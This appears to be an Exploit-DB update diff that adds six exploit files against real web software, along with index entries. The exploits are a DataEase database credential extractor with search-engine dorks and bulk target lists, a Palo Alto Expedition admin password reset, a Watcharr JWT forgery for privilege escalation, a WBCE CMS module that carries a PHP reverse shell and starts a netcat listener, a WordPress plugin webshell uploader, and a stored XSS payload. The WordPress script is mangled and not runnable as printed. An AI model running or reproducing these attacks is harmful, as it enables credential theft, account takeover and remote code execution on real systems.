DB: 2025-04-07

7 changes to exploits/shellcodes/ghdb

DataEase 2.4.0 - Database Configuration Information Exposure

Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover
Watcharr 1.43.0 - Remote Code Execution (RCE)
WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)

Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload

Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)

exploits/java/webapps/52128.py

@@ -0,0 +1,93 @@
+################################################################
+############################                                   #
+#- Exploit Title: DataEase Database Creds Extractor            #
+#- Shodan Dork: http.html:"dataease"                           #
+#- FOFA Dork: body="dataease" && title=="DataEase"             #
+#- Exploit Author: ByteHunter                                  #
+#- Email: 0xByteHunter@proton.me                               #
+#- vulnerable Versions: 2.4.0-2.5.0                            #
+#- Tested on: 2.4.0                                            #
+#- CVE : CVE-2024-30269                                        #
+############################                                   #
+################################################################
+
+import argparse
+import requests
+import re
+import json
+from tqdm import tqdm
+
+def create_vulnerability_checker():
+    vulnerable_count = 0
+
+    def check_vulnerability(url):
+        nonlocal vulnerable_count
+        endpoint = "/de2api/engine/getEngine;.js"
+        full_url = f"{url}{endpoint}"
+        headers = {
+            "Host": url.split('/')[2],
+            "Accept-Encoding": "gzip, deflate, br",
+            "Accept": "*/*",
+            "Accept-Language": "en-US;q=0.9,en;q=0.8",
+            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36",
+            "Connection": "close",
+            "Cache-Control": "max-age=0"
+        }
+
+        try:
+            response = requests.get(full_url, headers=headers, timeout=5)
+            if response.status_code == 200:
+                try:
+                    json_data = response.json()
+                    config = json_data.get("data", {}).get("configuration", None)
+
+                    if config:
+                        config_data = json.loads(config)
+
+                        username = config_data.get("username")
+                        password = config_data.get("password")
+                        port = config_data.get("port")
+
+                        if username and password:
+                            vulnerable_count += 1
+                            print(f"Vulnerable: {full_url}")
+                            print(f"Username: {username}")
+                            print(f"Password: {password}")
+                            if port is not None:
+                                print(f"Port Number: {port}")
+
+                except (json.JSONDecodeError, KeyError):
+                    print(f"Invalid JSON response from {full_url}")
+
+        except requests.RequestException:
+            pass
+
+        return vulnerable_count
+
+    return check_vulnerability
+
+def main():
+    parser = argparse.ArgumentParser(description="CVE-2024-30269 DataEase Database Creds Extractor")
+    parser.add_argument('-u', '--url', type=str, help='Single target')
+    parser.add_argument('-l', '--list', type=str, help='URL File List')
+    args = parser.parse_args()
+
+    check_vulnerability = create_vulnerability_checker()
+
+    if args.url:
+        check_vulnerability(args.url)
+    elif args.list:
+        try:
+            with open(args.list, 'r') as file:
+                urls = [url.strip() for url in file.readlines() if url.strip()]
+            total_urls = len(urls)
+            for url in tqdm(urls, desc="Processing URLs", unit="url"):
+                check_vulnerability(url)
+               # tqdm.write(f"Vulnerable Instances: {check_vulnerability(url)}/{total_urls}")
+        except FileNotFoundError:
+            print(f"File not found: {args.list}")
+    else:
+        print("provide a URL with -u or a file with -l.")
+
+if __name__ == "__main__":
+    main()

exploits/multiple/webapps/52129.py

@@ -0,0 +1,57 @@
+################################################################################################
+############################                                                                   #
+#- Exploit Title: PoC for Admin Account Password Reset of Palo Alto Networks Expedition tool   #
+#- Shodan Dork: html:"expedition project"                                                      #
+#- FOFA Dork: "expedition project" && icon_hash="1499876150"                                   #
+#- Exploit Author: ByteHunter                                                                  #
+#- Email: 0xByteHunter@proton.me                                                               #
+#- Vulnerable Versions: 1.2 < 1.2.92                                                           #
+#- Tested on: 1.2.90.1 & 1.2.75                                                                #
+#- CVE : CVE-2024-5910                                                                         #
+############################                                                                   #
+################################################################################################
+
+import requests
+import argparse
+import warnings
+
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+warnings.simplefilter("ignore", InsecureRequestWarning)
+
+ENDPOINT = '/OS/startup/restore/restoreAdmin.php'
+
+def send_request(base_url):
+    url = f"{base_url}{ENDPOINT}"
+    print(f"Testing URL: {url}")
+    try:
+        response = requests.get(url, verify=False, timeout=7)
+        if response.status_code == 200:
+            print("✓ Admin password restored to: 'paloalto'\n")
+            print("✓ admin panel is now accessable via ==> admin:paloalto creds")
+        else:
+            print(f"Request failed with status code: {response.status_code}\n")
+    except requests.exceptions.RequestException as e:
+        print(f"Error sending request to {url}") #{e}
+
+def main():
+    parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC')
+    parser.add_argument('-u', '--url', type=str, help='single target URL')
+    parser.add_argument('-l', '--list', type=str, help='URL target list')
+
+    args = parser.parse_args()
+
+    if args.url:
+        send_request(args.url)
+    elif args.list:
+        try:
+            with open(args.list, 'r') as file:
+                urls = file.readlines()
+                for base_url in urls:
+                    send_request(base_url.strip())
+        except FileNotFoundError:
+            print(f"File not found: {args.list}")
+    else:
+        print("I need a URL address with -u or a URL file list with -l.")
+
+if __name__ == '__main__':
+    main()

exploits/multiple/webapps/52130.py

@@ -0,0 +1,108 @@
+# CVE-2024-48827 exploit by Suphawith Phusanbai
+# Affected Watcharr version 1.43.0 and below.
+import argparse
+import requests
+import json
+import jwt
+from pyfiglet import Figlet
+
+f = Figlet(font='slant',width=100)
+print(f.renderText('CVE-2024-48827'))
+
+#store JWT token and UserID \ เก็บ token กับ UserID
+jwt_token = None
+user_id = None
+
+#login to obtain JWT token / ล็อคอินเพื่อรับ JWT Token
+def login(host, port, username, password):
+    url = f'http://{host}:{port}/api/auth/'
+    #payload in login API request \ payload ใน json
+    payload = {
+        'username': username,
+        'password': password
+    }
+
+    headers = {
+        'Content-Type': 'application/json'
+    }
+    #login to obtain JWT token \ ล็อคอินเพิ่อเก็บ JWT token แล้วใส่ใน jwt_token object
+    try:
+        response = requests.post(url, data=json.dumps(payload), headers=headers)
+        if response.status_code == 200:
+            token = response.json().get('token')
+            if token:
+                print(f"[+] SUCCESS! JWT Token: {token}")
+                global jwt_token
+                jwt_token = token
+
+                #decode JWT token and store UserID in UserID object \ ดีโค้ด JWT token แล้วเก็บค่า UserID ใส่ใน UserID object
+                decoded_payload = jwt.decode(token, options={"verify_signature": False})
+                global user_id
+                user_id = decoded_payload.get('userId')
+
+                return token
+            else:
+                print("[-] Check your password again!")
+        else:
+            print(f"[-] Failed :(")
+            print(f"Response: {response.text}")
+    except Exception as e:
+        print(f"Error! HTTP response code: {e}")
+
+#craft the admin token(to make this work you need to know admin username) \ สร้าง admin JWT token ขึ้นมาใหม่โดยใช้ token ที่ล็อคอิน
+def create_new_jwt(original_token):
+    try:
+        decoded_payload = jwt.decode(original_token, options={"verify_signature": False})
+        #userID = 1 is always the admin \ userID ลำดับที่ 1 คือ admin เสมอ
+        decoded_payload['userId'] = 1
+        new_token = jwt.encode(decoded_payload, '', algorithm='HS256')
+        print(f"[+] New JWT Token: {new_token}")
+        return new_token
+    except Exception as e:
+        print(f"[-] Failed to create new JWT: {e}")
+
+#privilege escalation with the crafted JWT token \ PE โดยการใช้ crafted admin token
+def privilege_escalation(host, port, adminuser, token):
+    #specify API endpoint for giving users admin role \ เรียกใช้งาน API สำหรับให้สิทธิ์ user admin
+    url = f'http://{host}:{port}/api/server/users/{user_id}'
+
+    # permission 3 givefull access privs you can also use 6 and 9 to gain partial admin privileges. \ ให้สิทธิ์ admin ทั้งหมดด้วย permission = 3
+    payload = {
+        "permissions": 3
+    }
+
+    headers = {
+        'Authorization': f'{token}',
+        'Content-Type': 'application/json'
+    }
+
+    try:
+        response = requests.post(url, data=json.dumps(payload), headers=headers)
+        if response.status_code == 200:
+            print(f"[+] Privilege Escalation Successful! The current user is now an admin!")
+        else:
+            print(f"[-] Failed to escalate privileges. Response: {response.text}")
+    except Exception as e:
+        print(f"Error during privilege escalation: {e}")
+
+
+#exampl usage: python3 CVE-2024-48827.py -u dummy -p dummy -host 172.22.123.13 -port 3080 -adminuser admin
+#usage
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Exploit CVE-2024-48827 to obtain JWT token and escalate privileges.')
+    parser.add_argument('-host', '--host', type=str, help='Host or IP address', required=True)
+    parser.add_argument('-port', '--port', type=int, help='Port', required=True, default=3080)
+    parser.add_argument('-u', '--username', type=str, help='Username for login', required=True)
+    parser.add_argument('-p', '--password', type=str, help='Password for login', required=True)
+    parser.add_argument('-adminuser', '--adminuser', type=str, help='Admin username to escalate privileges', required=True)
+    args = parser.parse_args()
+
+    #step 1: login
+    token = login(args.host, args.port, args.username, args.password)
+
+    #step 2: craft the admin token
+    if token:
+        new_token = create_new_jwt(token)
+        #step 3: Escalate privileges with crafted token. Enjoy!
+        if new_token:
+            privilege_escalation(args.host, args.port, args.adminuser, new_token)

exploits/multiple/webapps/52132.sh

@@ -0,0 +1,199 @@
+# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
+# Date: 3/22/2025
+# Exploit Author: Swammers8
+# Vendor Homepage: https://wbce-cms.org/
+# Software Link: https://github.com/WBCE/WBCE_CMS
+# Version: 1.6.3 and prior
+# Tested on: Ubuntu 24.04.2 LTS
+# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
+# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE
+
+#!/bin/bash
+
+# Make a zip file exploit
+# Start netcat listener
+
+if [[ $# -ne 2 ]]; then
+	echo "[*] Description:"
+	echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
+	echo "[*] It will create an infected module .zip file and start a netcat listener."
+	echo "[*] Once the zip is created, you will have to login to the admin page"
+	echo "[*] to upload and install the module, which will immediately run the shell"
+	echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
+	echo "[!] Usage:"
+	echo "[*] $0 <lhost> <lport>"
+	exit 1
+fi
+
+if [ -z "$(which nc)" ]; then
+	echo "[!] Netcat is not installed."
+	exit 1
+fi
+
+ip=$1
+port=$2
+
+rm -rf shellModule.zip
+rm -rf shellModule
+mkdir shellModule
+
+echo [*] Crafting Payload
+
+cat <<EOF > shellModule/info.php
+<?php
+/**
+ *
+ * @category        modules
+ * @package         Reverse Shell
+ * @author          Swammers8
+ * @link                        https://swammers8.github.io/
+ * @license         http://www.gnu.org/licenses/gpl.html
+ * @platform        example.com
+ * @requirements    PHP 5.6 and higher
+ * @version         1.3.3.7
+ * @lastmodified    May 22 2025
+ *
+ *
+ */
+
+\$module_directory               = 'modshell';
+\$module_name                    = 'Reverse Shell';
+\$module_function                = 'page';
+\$module_version                 = '1.3.3.7';
+\$module_platform                = '2.10.x';
+
+\$module_author                  = 'Swammers8';
+\$module_license                 = 'GNU General Public License';
+\$module_description     = 'This module is a backdoor';
+
+?>
+EOF
+
+cat <<EOF > shellModule/install.php
+<?php
+set_time_limit (0);
+\$VERSION = "1.0";
+\$ip = '$ip';  // CHANGE THIS
+\$port = $port;       // CHANGE THIS
+\$chunk_size = 1400;
+\$write_a = null;
+\$error_a = null;
+\$shell = 'uname -a; w; id; /bin/sh -i';
+\$daemon = 0;
+\$debug = 0;
+
+if (function_exists('pcntl_fork')) {
+	\$pid = pcntl_fork();
+	if (\$pid == -1) {
+		printit("ERROR: Can't fork");
+		exit(1);
+	}
+
+	if (\$pid) {
+		exit(0);  // Parent exits
+	}
+
+	if (posix_setsid() == -1) {
+		printit("Error: Can't setsid()");
+		exit(1);
+	}
+
+	\$daemon = 1;
+} else {
+	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
+}
+
+chdir("/");
+
+umask(0);
+
+
+\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
+if (!\$sock) {
+	printit("\$errstr (\$errno)");
+	exit(1);
+}
+
+\$descriptorspec = array(
+   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
+   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
+   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
+);
+
+\$process = proc_open(\$shell, \$descriptorspec, \$pipes);
+
+if (!is_resource(\$process)) {
+	printit("ERROR: Can't spawn shell");
+	exit(1);
+}
+
+stream_set_blocking(\$pipes[0], 0);
+stream_set_blocking(\$pipes[1], 0);
+stream_set_blocking(\$pipes[2], 0);
+stream_set_blocking(\$sock, 0);
+
+printit("Successfully opened reverse shell to \$ip:\$port");
+
+while (1) {
+	if (feof(\$sock)) {
+		printit("ERROR: Shell connection terminated");
+		break;
+	}
+
+	if (feof(\$pipes[1])) {
+		printit("ERROR: Shell process terminated");
+		break;
+	}
+
+	\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
+	\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);
+
+	if (in_array(\$sock, \$read_a)) {
+		if (\$debug) printit("SOCK READ");
+		\$input = fread(\$sock, \$chunk_size);
+		if (\$debug) printit("SOCK: \$input");
+		fwrite(\$pipes[0], \$input);
+	}
+
+	if (in_array(\$pipes[1], \$read_a)) {
+		if (\$debug) printit("STDOUT READ");
+		\$input = fread(\$pipes[1], \$chunk_size);
+		if (\$debug) printit("STDOUT: \$input");
+		fwrite(\$sock, \$input);
+	}
+
+	if (in_array(\$pipes[2], \$read_a)) {
+		if (\$debug) printit("STDERR READ");
+		\$input = fread(\$pipes[2], \$chunk_size);
+		if (\$debug) printit("STDERR: \$input");
+		fwrite(\$sock, \$input);
+	}
+}
+
+fclose(\$sock);
+fclose(\$pipes[0]);
+fclose(\$pipes[1]);
+fclose(\$pipes[2]);
+proc_close(\$process);
+
+function printit (\$string) {
+	if (!\$daemon) {
+		print "\$string\n";
+	}
+}
+
+?>
+EOF
+
+echo [*] Zipping to shellModule.zip
+zip -r shellModule.zip shellModule
+rm -rf shellModule
+echo [*] Please login to the WBCE admin panel to upload and install the module
+echo [*] Starting listener
+
+nc -lvnp $port
+
+echo
+echo
+echo "[*] Done!"
+echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"

exploits/php/webapps/52131.py

@@ -0,0 +1,93 @@
+# Exploit Title: WordPress Backup and Staging Plugin ≤ 1.21.16 - Arbitrary File Upload to RCE
+# Original Author: Patchstack (hypothetical)
+# Exploit Author: Al Baradi Joy
+# Exploit Date: April 5, 2025
+# Vendor Homepage: https://wp-timecapsule.com/
+# Software Link: https://wordpress.org/plugins/wp-time-capsule/
+# Version: Up to and including 1.21.16
+# Tested Versions: 1.21.16
+# CVE ID: CVE-2024-8856
+# Vulnerability Type: Arbitrary File Upload / Remote Code Execution
+# Description:
+# The WordPress plugin "Backup and Staging by WP Time Capsule" up to version 1.21.16
+# allows unauthenticated attackers to upload arbitrary files via the upload.php endpoint.
+# This can lead to remote code execution if a PHP file is uploaded and executed directly
+# from the wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/ directory.
+# Proof of Concept: Yes
+# Categories: WordPress Plugin, File Upload, RCE
+# CVSS Score: 9.9 (Critical)
+# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+# Notes:
+# Successful exploitation provides shell access as the user running the web server.
+# Ensure target is using the vulnerable plugin version before launching the attack.
+
+import requests
+
+# Banner
+def display_banner():
+print("="*80)
+print("Exploit Title: CVE-2024-8856 - WordPress Backup and Staging
+Plugin Arbitrary File Upload")
+print("Made By Al Baradi Joy")
+print("="*80)
+
+# Function to detect if the target supports HTTPS or falls back to HTTP
+def detect_protocol(domain):
+https_url = f"https://{domain}"
+http_url = f"http://{domain}"
+
+try:
+response = requests.get(https_url, timeout=5, allow_redirects=True)
+if response.status_code < 400:
+print(f"[✔] Target supports HTTPS: {https_url}")
+return https_url
+except requests.exceptions.RequestException:
+print("[!] HTTPS not available, falling back to HTTP.")
+
+try:
+response = requests.get(http_url, timeout=5, allow_redirects=True)
+if response.status_code < 400:
+print(f"[✔] Target supports HTTP: {http_url}")
+return http_url
+except requests.exceptions.RequestException:
+print("[✖] Target is unreachable on both HTTP and HTTPS.")
+exit(1)
+
+# Exploit function
+def exploit(target_url):
+target_url = detect_protocol(target_url.replace("http://",
+"").replace("https://", "").strip())
+upload_url =
+f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload.php"
+shell_url =
+f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/shell.php?cmd=whoami"
+
+files = {
+'file': ('shell.php', '<?php system($_GET["cmd"]); ?>',
+'application/x-php')
+}
+
+try:
+print(f"[+] Attempting to upload shell to: {upload_url}")
+response = requests.post(upload_url, files=files, timeout=10)
+
+if response.status_code == 200:
+print(f"[✔] Exploit successful! Webshell available at:
+{shell_url}")
+else:
+print(f"[✖] Failed to upload shell. Status code:
+{response.status_code}")
+
+except requests.exceptions.ConnectionError:
+print("[✖] Connection failed. Target may be down.")
+except requests.exceptions.Timeout:
+print("[✖] Request timed out. Target is slow or unresponsive.")
+except requests.exceptions.RequestException as e:
+print(f"[✖] Unexpected error: {e}")
+
+# Main execution
+if __name__ == "__main__":
+display_banner()
+target = input("[?] Enter the target URL (without http/https):
+").strip()
+exploit(target)

exploits/php/webapps/52133.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Reservit Hotel < 3.0 - Admin+ Stored XSS
+# Date: 2024-10-01
+# Exploit Author: Ilteris Kaan Pehlivan
+# Vendor Homepage: https://wpscan.com/plugin/reservit-hotel/
+# Version: Reservit Hotel 2.1
+# Tested on: Windows, WordPress, Reservit Hotel < 3.0
+# CVE : CVE-2024-9458
+
+The plugin does not sanitise and escape some of its settings, which could
+allow high privilege users such as admin to perform Stored Cross-Site
+Scripting attacks even when the unfiltered_html capability is disallowed
+(for example in multisite setup).
+
+1. Install and activate Reservit Hotel plugin.
+2. Go to Reservit hotel > Content
+3. Add the following payload to the Button text > French field sane save: "
+style=animation-name:rotation onanimationstart=alert(/XSS/)//
+4. The XSS will trigger upon saving and when any user will access the
+content dashboard again
+
+References:
+https://wpscan.com/vulnerability/1157d6ae-af8b-4508-97e9-b9e86f612550/
+https://www.cve.org/CVERecord?id=CVE-2024-9458

files_exploits.csv

@@ -5513,6 +5513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50952,exploits/java/webapps/50952.py,"Confluence Data Center 7.18.0 - Remote Code Execution (RCE)",2022-06-10,"Fellipe Oliveira",webapps,java,,2022-06-10,2022-06-10,0,CVE-2022-26134,,,,,
 50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",2021-09-01,"Fellipe Oliveira",webapps,java,,2021-09-01,2021-09-01,0,CVE-2021-26084,,,,,
 36548,exploits/java/webapps/36548.txt,"Contus Job Portal - 'Category' SQL Injection",2012-01-13,Lazmania61,webapps,java,,2012-01-13,2015-03-30,1,,,,,,https://www.securityfocus.com/bid/51404/info
+52128,exploits/java/webapps/52128.py,"DataEase 2.4.0 - Database Configuration Information Exposure",2025-04-06,ByteHunter,webapps,java,,2025-04-06,2025-04-06,0,CVE-2024-30269,,,,,
 33048,exploits/java/webapps/33048.txt,"DirectAdmin 1.33.6 - 'CMD_REDIRECT' Cross-Site Scripting",2009-05-19,r0t,webapps,java,,2009-05-19,2014-04-27,1,CVE-2009-2216;OSVDB-55296,,,,,https://www.securityfocus.com/bid/35450/info
 34293,exploits/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Cross-Site Scripting",2010-07-12,"David K",webapps,java,,2010-07-12,2014-08-08,1,,,,,,https://www.securityfocus.com/bid/41541/info
 33286,exploits/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Cross-Site Scripting",2009-10-14,"Michele Orru",webapps,java,,2009-10-14,2014-05-10,1,CVE-2009-4521;OSVDB-58941,,,,,https://www.securityfocus.com/bid/36674/info
@@ -12192,6 +12193,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51646,exploits/multiple/webapps/51646.txt,"Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)",2023-08-04,"Ahmet Ümit BAYRAM",webapps,multiple,,2023-08-04,2023-08-04,0,,,,,,
 43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
 51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
+52129,exploits/multiple/webapps/52129.py,"Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover",2025-04-06,ByteHunter,webapps,multiple,,2025-04-06,2025-04-06,0,CVE-2024-5910,,,,,
 51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,,
 51452,exploits/multiple/webapps/51452.py,"PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27350,,,,,
 35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
@@ -12378,6 +12380,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12610,exploits/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",webapps,multiple,,2010-05-13,,1,CVE-2010-1143,,,,,
 48804,exploits/multiple/webapps/48804.py,"VTENEXT 19 CE - Remote Code Execution",2020-09-11,"Marco Ruela",webapps,multiple,,2020-09-11,2020-09-11,0,,,,,,
 10999,exploits/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,webapps,multiple,,2010-01-03,,0,OSVDB-63644,,,,http://www.exploit-db.comw-agora-4.2.1-php.zip,
+52130,exploits/multiple/webapps/52130.py,"Watcharr 1.43.0 - Remote Code Execution (RCE)",2025-04-06,"Suphawith Phusanbai",webapps,multiple,,2025-04-06,2025-04-06,0,CVE-2024-48827,,,,,
+52132,exploits/multiple/webapps/52132.sh,"WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)",2025-04-06,Swammers8,webapps,multiple,,2025-04-06,2025-04-06,0,,,,,,
 31233,exploits/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc?camnum' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple,,2008-02-18,2014-01-28,1,CVE-2008-5674;OSVDB-42927,,,,,https://www.securityfocus.com/bid/27875/info
 31234,exploits/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic?id' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple,,2008-02-18,2014-01-28,1,CVE-2008-5674;OSVDB-42928,,,,,https://www.securityfocus.com/bid/27875/info
 50463,exploits/multiple/webapps/50463.txt,"WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)",2021-10-29,3ndG4me,webapps,multiple,,2021-10-29,2021-10-29,0,CVE-2021-31682,,,,,
@@ -14638,6 +14642,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
 5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
 34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info
+52131,exploits/php/webapps/52131.py,"Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload",2025-04-06,"Al Baradi Joy",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-8856,,,,,
 37208,exploits/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting",2012-05-16,LiquidWorm,webapps,php,,2012-05-16,2015-06-05,1,CVE-2012-2911;OSVDB-82297,,,,,https://www.securityfocus.com/bid/53575/info
 15234,exploits/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure",2010-10-11,"John Leitch",webapps,php,,2010-10-11,2010-10-11,1,OSVDB-68598;CVE-2010-4801,,,http://www.exploit-db.com/screenshots/idlt15500/screen.png,http://www.exploit-db.combaconmap1Duroc.zip,
 15233,exploits/php/webapps/15233.txt,"BaconMap 1.0 - SQL Injection",2010-10-11,"John Leitch",webapps,php,,2010-10-11,2010-10-11,1,OSVDB-68599;CVE-2010-4800,,,,http://www.exploit-db.combaconmap1Duroc.zip,
@@ -29018,6 +29023,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5911,exploits/php/webapps/5911.txt,"ResearchGuide 0.5 - 'id' SQL Injection",2008-06-23,dun,webapps,php,,2008-06-22,2016-12-09,1,OSVDB-46843;CVE-2008-2964,,,,,
 19775,exploits/php/webapps/19775.txt,"Reserve Logic 1.2 Booking CMS - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,webapps,php,,2012-07-12,2012-07-12,0,CVE-2010-4980;OSVDB-83844;OSVDB-83842;OSVDB-83841;OSVDB-83840;OSVDB-83839;OSVDB-83838;OSVDB-83837;OSVDB-83836;OSVDB-83835;OSVDB-83834;OSVDB-83833;OSVDB-83832;OSVDB-83831;OSVDB-83830;OSVDB-83829;OSVDB-83828;OSVDB-83827;OSVDB-65952,,,,,https://www.vulnerability-lab.com/get_content.php?id=617
 46210,exploits/php/webapps/46210.txt,"Reservic 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80,2019-01-21,2019-01-21,1,,"SQL Injection (SQLi)",,,,
+52133,exploits/php/webapps/52133.txt,"Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)",2025-04-06,"Ilteris Kaan Pehlivan",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-9458,,,,,
 43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,,2018-01-17,2018-01-17,0,CVE-2018-5705,,,,,
 48627,exploits/php/webapps/48627.txt,"Reside Property Management 3.0 - 'profile' SQL Injection",2020-06-30,"Behzad Khalifeh",webapps,php,,2020-06-30,2020-06-30,0,,,,,,
 35541,exploits/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",webapps,php,,2014-12-15,2014-12-15,0,OSVDB-115821;OSVDB-115820;OSVDB-115819;OSVDB-115818,,,,,